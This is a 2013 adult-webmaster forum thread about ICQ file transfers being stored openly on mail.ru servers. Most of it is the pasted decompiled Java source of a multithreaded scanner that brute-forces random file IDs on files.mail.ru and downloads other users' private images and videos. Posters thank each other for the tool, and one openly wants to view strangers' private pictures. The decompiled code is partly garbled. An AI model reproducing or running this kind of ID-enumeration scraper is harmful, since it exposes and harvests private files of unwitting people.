Sending files via ICQ? You're fucked! - GoFuckYourself.com

just a punk · 01-12-2013, 03:36 AM

Read this: http://translate.google.com/translat...s%2F6239 5%2F

This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

You've been warned (many times already actually).

facialfreak · 01-12-2013, 07:54 AM

Yep... People need to learn the basics in online security NOW!!

The days of 'bank robbers' and 'vinyl siding/home reno salesmen' are quickly disappearing!! It is much simpler to scam people online!

If you do not know how to protect yourself .... then NOW is the time to ask somebody who does!

marlboroack · 01-12-2013, 09:28 AM

So i guess you're double fucked if you have a mac?

just a punk · 01-12-2013, 10:09 AM

It does not matter what you have. Avery file you send via ICQ is being uploaded to the mail.ru servers and becomes available for everyone.

$5 submissions · 01-13-2013, 10:11 PM

Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

rowan · 01-13-2013, 10:18 PM

Speaking of security, I thought we'd all disabled Java.

Dirty F · 01-13-2013, 10:27 PM

I have no clue what all of this means. I simply want to see all these private pictures. How do i do that?

CYF · 01-13-2013, 10:53 PM

Quote:

Originally Posted by Dirty F

I have no clue what all of this means. I simply want to see all these private pictures. How do i do that?

I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown rusian source

Dirty F · 01-13-2013, 11:07 PM

Once it works may i use it?

Dirty F · 01-13-2013, 11:07 PM

Or simply share the download with me

just a punk · 01-14-2013, 04:13 AM

Quote:

Originally Posted by rowan

Speaking of security, I thought we'd all disabled Java.

This has nothing to do with Java.

just a punk · 01-14-2013, 04:19 AM

Quote:

Originally Posted by CYF

I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown rusian source

If you'd spent a bit more time for reading, you would find the source of that Java app "from an unknown Russian source", which is located here: http://pastebin.com/n1qpNM4y. There are no backdoors in it so you can compile and run it by yourself.

However AFAIK it doesn't work anymore because mail.ru has moved all files to another location and they are 404 now... after they already leaked into the public. "Good job".

just a punk · 01-14-2013, 04:30 AM

Quote:

Originally Posted by $5 submissions

Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

I didn't get it. What exactly is "rough" there? Java is not an .exe and it's easy to reverse (de-compile). If you think there is a virus in some Java app, why don't you just check it here: http://www.showmycode.com/? That's so fuckin' simple and can be done even by a kid

Here is the REVERSED contents of that jar:

IFS.class

Code:

import java.io.PrintStream;
import java.util.Random;

public class IFS
{
    /* member class not found */
    class MyRunnable {}


    public IFS()
    {
    }

    public static void main(String args[])
    {
        System.out.println("ICQ Files Scanner 0.3");
        for(int i = 0; i < 50; i++)
            (new Thread(new MyRunnable(i))).start();

    }

    public static String generateString(Random random, String s, int i)
    {
        char ac[] = new char[i];
        for(int j = 0; j < i; j++)
            ac[j] = s.charAt(random.nextInt(s.length()));

        return new String(ac);
    }

    private static final int THREADS = 50;
}

IFS$MyRunnable.class

Code:

import java.io.*;
import java.net.*;
import java.util.Random;

private static class mThreadId
    implements Runnable
{

    public void run()
    {
        File file = new File("out");
        file.mkdirs();
        String s = String.format("ifs%d.txt", new Object[] {
            Integer.valueOf(mThreadId)
        });
        do
        {
            mTotal++;
            String s1 = IFS.generateString(random, "1234567890QWERTYUIOPASDFGHJKLZXCVBNM", 6);
            String s2 = String.format("http://files.mail.ru/%s", new Object[] {
                s1
            });
            try
            {
                URL url = new URL(s2);
                URLConnection urlconnection = url.openConnection();
                urlconnection.connect();
                urlconnection.getContent();
                String s3 = urlconnection.getContentType();
                int i = urlconnection.getContentLength();
                String s4 = "done    ";
                if(i != 4189)
                {
                    if("image/jpeg".equals(s3))
                    {
                        File file1 = new File("out", (new StringBuilder()).append(s1).append(".jpg").toString());
                        saveBinaryFile(urlconnection, i, url, file1);
                    } else
                    if("image/tiff".equals(s3))
                    {
                        File file2 = new File("out", (new StringBuilder()).append(s1).append(".tiff").toString());
                        saveBinaryFile(urlconnection, i, url, file2);
                    } else
                    if("image/x-ms-bmp".equals(s3))
                    {
                        File file3 = new File("out", (new StringBuilder()).append(s1).append(".bmp").toString());
                        saveBinaryFile(urlconnection, i, url, file3);
                    } else
                    if("image/png".equals(s3))
                    {
                        File file4 = new File("out", (new StringBuilder()).append(s1).append(".png").toString());
                        saveBinaryFile(urlconnection, i, url, file4);
                    } else
                    if("image/gif".equals(s3))
                    {
                        File file5 = new File("out", (new StringBuilder()).append(s1).append(".gif").toString());
                        saveBinaryFile(urlconnection, i, url, file5);
                    } else
                    {
                        File file6 = new File("out", (new StringBuilder()).append(s1).append(".mpg").toString());
                        saveBinaryFile(urlconnection, i, url, file6);
                    }
                } else
                {
                    s4 = "not found";
                }
                mSuccess++;
                double d = mSuccess / mTotal;
                String s5 = String.format("(%d) %s %d/%d=%f %s %d %s", new Object[] {
                    Integer.valueOf(mThreadId), s4, Integer.valueOf(mSuccess), Integer.valueOf(mTotal), Double.valueOf(d), s3, Integer.valueOf(i), s2
                });
                System.out.println(s5);
                writeToFile(s, s5);
            }
            catch(MalformedURLException malformedurlexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), malformedurlexception.getMessage()
                }));
            }
            catch(FileNotFoundException filenotfoundexception) { }
            catch(IOException ioexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), ioexception.getMessage()
                }));
            }
        } while(true);
    }

    private void saveBinaryFile(URLConnection urlconnection, int i, URL url, File file)
        throws IOException
    {
        InputStream inputstream = urlconnection.getInputStream();
        BufferedInputStream bufferedinputstream = new BufferedInputStream(inputstream);
        byte abyte0[] = new byte[i];
        boolean flag = false;
        int k = 0;
        do
        {
            if(k >= i)
                break;
            int j = bufferedinputstream.read(abyte0, k, abyte0.length - k);
            if(j == -1)
                break;
            k += j;
        } while(true);
        bufferedinputstream.close();
        if(k != i)
        {
            throw new IOException((new StringBuilder()).append("Only read ").append(k).append(" bytes; Expected ").append(i).append(" bytes").toString());
        } else
        {
            FileOutputStream fileoutputstream = new FileOutputStream(file);
            fileoutputstream.write(abyte0);
            fileoutputstream.flush();
            fileoutputstream.close();
            return;
        }
    }

    private void writeToFile(String s, String s1)
    {
        BufferedWriter bufferedwriter;
        Object obj = null;
        bufferedwriter = null;
        FileWriter filewriter = new FileWriter(s, true);
        bufferedwriter = new BufferedWriter(filewriter);
        bufferedwriter.append(s1);
        bufferedwriter.newLine();
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception) { }
        break MISSING_BLOCK_LABEL_128;
        IOException ioexception1;
        ioexception1;
        System.out.println(String.format("(%d) %s", new Object[] {
            Integer.valueOf(mThreadId), ioexception1.getMessage()
        }));
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception2) { }
        break MISSING_BLOCK_LABEL_128;
        Exception exception;
        exception;
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception3) { }
        throw exception;
    }

    private static final String CHARS = "1234567890QWERTYUIOPASDFGHJKLZXCVBNM";
    private static final int ID_LENGTH = 6;
    private static final String STR_MESSAGE = "(%d) %s";
    private static final String STR_SUCCESS = "(%d) %s %d/%d=%f %s %d %s";
    private static final String FILE_NAME = "ifs%d.txt";
    private static final String URL = "http://files.mail.ru/%s";
    private static final int MAX_SIZE = 0x6400000;
    private final Random random = new Random();
    private final int mThreadId;
    private int mSuccess;
    private int mTotal;

    public tion(int i)
    {
        mSuccess = 0;
        mTotal = 0;
        mThreadId = i;
    }
}

Some people afraid of even their own shadow

P.S. You are too late because it doesn't work anymore

ZeroHero · 01-14-2013, 06:34 AM

many thanks for this

BIGTYMER · 01-14-2013, 06:39 AM

What is the mail.ru connection? Does ICQ and mail.ru have the same owner?

just a punk · 01-14-2013, 07:58 AM

ICQ is an instant messaging computer program that was first developed and popularized by the Israeli company Mirabilis, then bought by America Online, and since April 2010 owned by Mail.ru Group.More...

And yes, they mail.ru and icq.com have the same owner and they share the same servers.

Once again, the problem is following. Before 2010 ICQ was using P2P protocol to transfer a file between two clients. Now ALL files you send to someone over ICQ go the mail.ru servers whey they get stored permanently and are openly available to any 3rd person.

For example: http://files.icq.net/files/get?fileId=E132656500FC40E99DC98575E53616D5 (mail.ru alias: http://files.mail.ru/files/get?fileId=E132656500FC40E99DC98575E53616D5) is a file which was sent from one ICQ client to another one.

They just replaced 6-byte file ID's by 16-byte hashes (this is why that Java scanner doesn't work anymore) but the security problem was not fixed. The files you send via ICQ aren't safe. Everything you did send now stored at mail.ru servers without any protection.

1) They are collecting your data.
2) They do not protect it from others.

Do you see what I mean now?

Tom_PM · 01-14-2013, 09:11 AM

So that picture someone sent me of a cat who fell asleep in it's bowl of food is being seen by everyone? Ohmygod

JamesM · 01-14-2013, 10:04 AM

pretty bad move, storing public data on servers and can be easily accessible to anyone with internet.

just a punk · 01-14-2013, 11:34 AM

Quote:

Originally Posted by PR_Tom

So that picture someone sent me of a cat who fell asleep in it's bowl of food is being seen by everyone? Ohmygod

So you don't use ICQ for the work purposes? Good for you.

Supz · 01-14-2013, 11:38 AM

I am not sure why adult webmasters and russian spammers are still the only people using ICQ. I deleted my icq atleast a year ago. There are much better, secure ways of chatting online.

just a punk · 01-14-2013, 11:40 AM

Quote:

Originally Posted by Supz

There are much better, secure ways of chatting online.

Jabber

Tom_PM · 01-14-2013, 12:22 PM

Quote:

Originally Posted by CyberSEO

So you don't use ICQ for the work purposes? Good for you.

With file sending? Nope. I can't recall a single important work item I've ever sent as a file through ICQ ever. Usually just a funny picture now and then.

just a punk · 01-14-2013, 03:11 PM

FYI: all your ICQ chat logs are also stored on their servers.

PornDiscounts-V · 01-14-2013, 04:02 PM

Looks like 35PPS program just got some more verified twitter account images. ;)

rowan · 01-14-2013, 04:40 PM

Quote:

Originally Posted by CyberSEO

This has nothing to do with Java.

I know the issue is not directly related to Java, but I thought it was a little ironic that you pointed towards a Java file on a Russian server only a few days after the hysteria over Java's security started.

01-12-2013, 03:36 AM	#1
just a punk So fuckin' bored Industry Role: Join Date: Jun 2003 Posts: 32,383	Sending files via ICQ? You're fucked! Read this: http://translate.google.com/translat...s%2F6239 5%2F This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385 You've been warned (many times already actually). __________________ Obey the Cowgod Last edited by just a punk; 01-12-2013 at 03:49 AM..

01-12-2013, 07:54 AM	#2
facialfreak Confirmed User Join Date: Feb 2005 Location: Montreal Posts: 3,018	Yep... People need to learn the basics in online security NOW!! The days of 'bank robbers' and 'vinyl siding/home reno salesmen' are quickly disappearing!! It is much simpler to scam people online! If you do not know how to protect yourself .... then NOW is the time to ask somebody who does! __________________ Managed Shared Hosting starting at $4.99/mo Managed VPS starting at $29.99/mo

01-12-2013, 10:09 AM	#4
just a punk So fuckin' bored Industry Role: Join Date: Jun 2003 Posts: 32,383	It does not matter what you have. Avery file you send via ICQ is being uploaded to the mail.ru servers and becomes available for everyone. __________________ Obey the Cowgod

01-13-2013, 10:11 PM	#5
$5 submissions I help you SUCCEED Industry Role: Join Date: Nov 2003 Location: The Pearl of the Orient Seas Posts: 32,195	Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385 __________________ Need a NON-ADULT income stream? We build your YOUTUBE CHANNEL for only $20 per video! For Hire: $3/hour or $400 per month Marketing Specialist Virtual Assistants

01-14-2013, 07:58 AM	#16
just a punk So fuckin' bored Industry Role: Join Date: Jun 2003 Posts: 32,383	ICQ is an instant messaging computer program that was first developed and popularized by the Israeli company Mirabilis, then bought by America Online, and since April 2010 owned by Mail.ru Group.More... And yes, they mail.ru and icq.com have the same owner and they share the same servers. Once again, the problem is following. Before 2010 ICQ was using P2P protocol to transfer a file between two clients. Now ALL files you send to someone over ICQ go the mail.ru servers whey they get stored permanently and are openly available to any 3rd person. For example: http://files.icq.net/files/get?fileId=E132656500FC40E99DC98575E53616D5 (mail.ru alias: http://files.mail.ru/files/get?fileId=E132656500FC40E99DC98575E53616D5) is a file which was sent from one ICQ client to another one. They just replaced 6-byte file ID's by 16-byte hashes (this is why that Java scanner doesn't work anymore) but the security problem was not fixed. The files you send via ICQ aren't safe. Everything you did send now stored at mail.ru servers without any protection. 1) They are collecting your data. 2) They do not protect it from others. Do you see what I mean now? __________________ Obey the Cowgod Last edited by just a punk; 01-14-2013 at 08:04 AM..

01-12-2013, 09:28 AM	#3
marlboroack So Fucking Banned Industry Role: Join Date: Jul 2010 Location: ☣ Posts: 9,327	So i guess you're double fucked if you have a mac?

01-13-2013, 10:18 PM	#6
rowan Too lazy to set a custom title Join Date: Mar 2002 Location: Australia Posts: 17,393	Speaking of security, I thought we'd all disabled Java.

01-13-2013, 10:27 PM	#7
Dirty F Too lazy to set a custom title Industry Role: Join Date: Jul 2001 Posts: 59,204	I have no clue what all of this means. I simply want to see all these private pictures. How do i do that?

01-13-2013, 11:07 PM	#9
Dirty F Too lazy to set a custom title Industry Role: Join Date: Jul 2001 Posts: 59,204	Once it works may i use it?

01-14-2013, 06:34 AM	#14
ZeroHero So Fucking Banned Industry Role: Join Date: Nov 2007 Location: Westbahnhof Posts: 15,336	many thanks for this

01-14-2013, 06:39 AM	#15
BIGTYMER Junior Achiever Industry Role: Join Date: Nov 2004 Location: Walled Garden Posts: 17,066	What is the mail.ru connection? Does ICQ and mail.ru have the same owner?

01-14-2013, 09:11 AM	#17
Tom_PM Porn Meister Industry Role: Join Date: Feb 2005 Posts: 16,443	So that picture someone sent me of a cat who fell asleep in it's bowl of food is being seen by everyone? Ohmygod __________________ 43-922-863 Shut up and play your guitar.

01-14-2013, 10:04 AM	#18
JamesM Confirmed User Industry Role: Join Date: Nov 2012 Posts: 732	pretty bad move, storing public data on servers and can be easily accessible to anyone with internet. __________________ Ex GF Films \| Grab Dollars Up To 80% Rev-Share \| 255 Day Cookie \| Legal Content \| Variety of Promo Tools \| CCBill Program \| GF Niche james[at]grabdollars[dot]com \| ICQ::611-99-zero-zero-20

01-14-2013, 11:38 AM	#20
Supz Arthur Flegenheimer Industry Role: Join Date: Jul 2006 Location: New York City Posts: 11,056	I am not sure why adult webmasters and russian spammers are still the only people using ICQ. I deleted my icq atleast a year ago. There are much better, secure ways of chatting online.

01-14-2013, 03:11 PM	#23
just a punk So fuckin' bored Industry Role: Join Date: Jun 2003 Posts: 32,383	FYI: all your ICQ chat logs are also stored on their servers. __________________ Obey the Cowgod

01-14-2013, 04:02 PM	#24
PornDiscounts-V Confirmed User Industry Role: Join Date: Oct 2003 Location: L.A. Posts: 5,744	Looks like 35PPS program just got some more verified twitter account images. ;)